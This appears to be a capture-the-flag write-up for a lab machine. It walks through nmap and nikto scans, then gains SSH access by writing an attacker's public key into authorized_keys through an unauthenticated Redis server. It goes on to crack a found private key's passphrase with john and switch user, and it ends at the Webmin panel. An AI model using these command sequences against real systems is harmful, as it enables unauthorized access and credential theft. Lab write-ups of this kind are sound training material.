PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.78 seconds
we can see
Port 80 http server Apache version 2.4.29
Port 6379 Redis: is an in-memory, key/value store, works much like a dictionary with a number of keys and corresponding values that can both be set and retrieved, essentially servers as a data structure server
Possibly vulnerable to RCE
Port 10000 MiniServ 1.910: web-based server management control panel for unix like systems
Possible vulnerable to RCE
Let's check out the HTTP server
let's run nikto and feroxbuster in the background and continue enumerating
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.160
+ Target Hostname: 10.10.10.160
+ Target Port: 80
+ Start Time: 2023-12-30 03:42:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: f04, size: 590f549ce0d74, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8048 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-12-30 03:46:22 (GMT-5) (234 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Not a whole lot here
REDIS
We can check if we can connect to the reddis server by using the following tools
redis-cli -h 10.10.10.160
we are given anonymous authentication (no authentication is in place)
we try and kind any keys on the server
keys *
returns nothing
Maybe we can write a ssh key to the
Lets check the current directory for redis
config get dir
We can make a educated guess and say this is most likely the redis home directory, we can confirm this by changing the current directory to ./.ssh
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir ./.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
Now that we can see our commands do prove the exsistence of the .ssh dirtectory, making this the redis home directory, Next we can create a ssh key and place this in the redis .ssh directory
Lets generate our key pairs
ssh-keygen -t rsa
Next we want to place our public key into temp.txt , we also want to add 2 blank line both before and after our text
Now we need to place our public key to the redis server, for this we will use the tool redis-cli
cat temp.txt | redis-cli -h 10.10.10.160 -x set s-key
redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
Now we should give the appropriate permissions to our private key and now be able to authenticate via SSH with our private key as Redis
chmod 600 id_rsa
ssh -i id_rsa redis@10.10.10.160
Now we have a SSH session as the user redis
Priv esc via redis
we do find a ssh private key within the /opt directory
we can copy this over to our local machine and possibly crack the password
first lets generate a crackable hash using ssh2john
sudo /opt/john/run/ssh2john.py id_rsa > hash
we can crack the hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
we get the password
computer2008
We coulnt ssh in, but in our already establsihed shell as redis we can just change over to the user Matt by
su Matt
we now have a session as Matt
miniserv
When we navigate to https://10.10.10.160:10000 we can see the following
